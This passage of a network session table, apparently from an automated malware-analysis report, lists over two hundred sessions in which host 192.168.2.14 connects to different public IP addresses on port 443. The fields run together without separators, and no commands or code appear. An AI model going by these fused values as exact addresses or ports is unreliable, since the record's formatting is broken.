                                                      17482192.168.2.1459860131.41.72.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17483192.168.2.1435366165.101.126.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17484192.168.2.143749061.214.107.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17485192.168.2.1459138212.78.120.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17486192.168.2.1438028118.235.130.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17487192.168.2.145392032.10.119.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17488192.168.2.1443706166.201.174.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17489192.168.2.1452558140.123.56.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17490192.168.2.1448494155.244.60.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17491192.168.2.1460086169.209.157.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17492192.168.2.143759044.36.229.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17493192.168.2.144051639.198.143.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17494192.168.2.1450912121.108.59.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17495192.168.2.1434076154.183.97.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17496192.168.2.1437988139.108.101.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17497192.168.2.1434874136.115.214.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17498192.168.2.1454566176.196.15.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17499192.168.2.146005081.230.195.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17500192.168.2.1453766132.158.153.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17501192.168.2.145994048.41.179.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17502192.168.2.1440970132.1.102.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17503192.168.2.143329858.122.241.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17504192.168.2.1441254114.254.125.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17505192.168.2.144884271.143.190.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17506192.168.2.14503244.141.53.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17507192.168.2.1445530162.122.43.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17508192.168.2.144024486.85.225.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17509192.168.2.144883243.145.97.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17510192.168.2.1434866124.187.233.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17511192.168.2.143884696.213.100.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17512192.168.2.1435898213.65.179.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17513192.168.2.1448460152.232.109.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17514192.168.2.146076462.0.25.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17515192.168.2.1448582109.223.121.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17516192.168.2.1439398164.214.195.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17517192.168.2.14412664.70.202.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17518192.168.2.144693246.157.231.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17519192.168.2.1448108144.195.13.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17520192.168.2.143327674.30.33.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17521192.168.2.1439284194.173.61.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17522192.168.2.1457342165.178.145.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17523192.168.2.1438898129.254.126.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17524192.168.2.144654212.108.165.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17525192.168.2.1446918133.136.112.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17526192.168.2.1457776188.22.98.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17527192.168.2.1439290117.106.221.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17528192.168.2.1460880110.15.18.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17529192.168.2.1439720151.56.167.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17530192.168.2.1453348101.214.223.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17531192.168.2.144935266.60.86.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17532192.168.2.1453218145.139.76.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17533192.168.2.1436072123.210.81.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17534192.168.2.1448356122.201.44.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17535192.168.2.143429840.103.234.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17536192.168.2.143893069.139.120.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17537192.168.2.1439148198.252.216.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17538192.168.2.1438234169.2.103.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17539192.168.2.1454992116.62.125.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17540192.168.2.1452816194.244.75.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17541192.168.2.1441014179.229.197.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17542192.168.2.14387604.222.133.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17543192.168.2.1446192154.56.83.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17544192.168.2.1446998167.74.133.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17545192.168.2.1435492138.151.200.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17546192.168.2.144251676.163.22.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17547192.168.2.143940085.97.192.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17548192.168.2.1456808105.218.227.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17549192.168.2.1433724119.246.243.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17550192.168.2.144090896.218.175.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17551192.168.2.1454134114.39.215.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17552192.168.2.145032484.85.23.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17553192.168.2.1455552190.163.85.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17554192.168.2.1458104206.194.106.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17555192.168.2.1440248187.226.199.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17556192.168.2.1442046140.204.135.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17557192.168.2.145370484.112.131.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17558192.168.2.1450728115.222.239.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17559192.168.2.144103671.103.227.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17560192.168.2.143595843.234.146.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17561192.168.2.145754665.184.186.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17562192.168.2.144133819.223.130.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17563192.168.2.1450064115.176.75.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17564192.168.2.145638064.218.197.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17565192.168.2.1437642172.152.37.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17566192.168.2.145574436.149.139.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17567192.168.2.1433874222.221.19.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17568192.168.2.1449484197.238.224.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17569192.168.2.14569442.8.18.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17570192.168.2.146001845.141.154.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17571192.168.2.1446092119.97.141.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17572192.168.2.143434691.183.65.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17573192.168.2.1439288119.138.76.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17574192.168.2.1457622210.118.26.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17575192.168.2.145779647.184.84.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17576192.168.2.1452724203.46.104.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17577192.168.2.14593089.66.158.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17578192.168.2.1439036172.184.249.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17579192.168.2.143862478.110.49.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17580192.168.2.1448122200.139.213.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17581192.168.2.143889220.232.142.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17582192.168.2.1447162209.112.233.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17583192.168.2.145299069.223.164.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17584192.168.2.14417542.58.131.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17585192.168.2.1441762223.50.30.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17586192.168.2.145775835.130.208.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17587192.168.2.1451356105.71.13.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17588192.168.2.1459112119.40.174.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17589192.168.2.1452932115.68.115.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17590192.168.2.1460830189.176.57.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17591192.168.2.143516032.168.203.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17592192.168.2.144807263.5.47.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17593192.168.2.1439280147.101.84.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17594192.168.2.1433378183.105.83.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17595192.168.2.1450132220.193.219.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17596192.168.2.1451088103.79.194.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17597192.168.2.145565812.35.174.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17598192.168.2.1452324195.144.223.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17599192.168.2.143434425.39.109.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17600192.168.2.145835812.129.216.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17601192.168.2.1456870218.232.108.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17602192.168.2.1454988157.129.15.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17603192.168.2.143524075.245.82.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17604192.168.2.144037249.166.75.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17605192.168.2.1443576120.44.92.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17606192.168.2.1456322157.194.138.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17607192.168.2.1460776147.191.70.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17608192.168.2.1444128111.226.135.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17609192.168.2.145576617.241.87.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17610192.168.2.1434124222.189.100.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17611192.168.2.145804238.236.137.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17612192.168.2.1449280203.20.66.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17613192.168.2.1459820124.167.130.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17614192.168.2.1446324188.110.200.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17615192.168.2.145294475.244.159.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17616192.168.2.144157096.150.173.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17617192.168.2.1459204173.153.25.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17618192.168.2.145751448.44.229.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17619192.168.2.1449896143.174.151.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17620192.168.2.1456852162.173.25.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17621192.168.2.144252814.241.221.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17622192.168.2.1435062128.96.195.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17623192.168.2.1435162164.255.190.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17624192.168.2.1450356202.216.38.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17625192.168.2.14548189.141.170.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17626192.168.2.143952262.233.117.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17627192.168.2.143984446.155.92.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17628192.168.2.1457660122.144.109.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17629192.168.2.1448180142.180.45.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17630192.168.2.1438690156.210.75.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17631192.168.2.1458674180.195.169.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17632192.168.2.1454244136.193.203.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17633192.168.2.1453702102.62.232.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17634192.168.2.14468909.44.183.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17635192.168.2.1438608110.134.72.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17636192.168.2.145949696.6.28.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17637192.168.2.145666858.7.139.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17638192.168.2.144852491.76.117.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17639192.168.2.1441182190.40.104.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17640192.168.2.1441082186.194.80.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17641192.168.2.145220643.76.56.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17642192.168.2.143884236.22.169.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17643192.168.2.1435178141.229.192.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17644192.168.2.1436774185.33.35.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17645192.168.2.1458342194.51.3.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17646192.168.2.144847431.197.88.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17647192.168.2.1451700223.30.11.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17648192.168.2.1442178131.216.54.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17649192.168.2.146042298.239.0.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17650192.168.2.1445108148.239.226.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17651192.168.2.1437802211.26.40.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17652192.168.2.1449718113.19.189.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17653192.168.2.1454904104.248.21.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17654192.168.2.144739624.211.170.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17655192.168.2.1453026187.253.178.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17656192.168.2.1443888204.245.17.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17657192.168.2.143851258.255.151.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17658192.168.2.144973665.64.11.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17659192.168.2.1434630218.69.247.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17660192.168.2.1437362154.54.66.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17661192.168.2.143922649.190.23.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17662192.168.2.1459602163.33.196.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17663192.168.2.1452328143.190.89.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17664192.168.2.144619623.29.26.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17665192.168.2.144859244.234.167.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17666192.168.2.1442888205.14.60.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17667192.168.2.1456078196.216.130.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17668192.168.2.1436726178.213.40.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17669192.168.2.144548470.40.248.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17670192.168.2.1439380146.208.87.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17671192.168.2.1437740104.47.164.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17672192.168.2.1453002141.154.143.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17673192.168.2.1456400195.207.77.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17674192.168.2.143603839.225.165.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17675192.168.2.146082045.37.74.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17676192.168.2.144919832.216.19.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17677192.168.2.1458544137.20.158.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17678192.168.2.1438560105.188.14.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17679192.168.2.146086284.237.183.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17680192.168.2.1455792158.191.29.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17681192.168.2.144907823.7.194.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17682192.168.2.1444094156.205.88.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17683192.168.2.1452872117.10.112.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17684192.168.2.1443392156.179.248.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17685192.168.2.1449866183.6.252.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17686192.168.2.1458484166.213.142.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17687192.168.2.1441708212.196.87.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17688192.168.2.144830436.206.52.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17689192.168.2.143669490.136.225.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17690192.168.2.145181887.124.13.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17691192.168.2.1434634212.120.211.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17692192.168.2.1444514203.137.252.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17693192.168.2.1452452181.81.185.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17694192.168.2.1437712120.75.97.113443
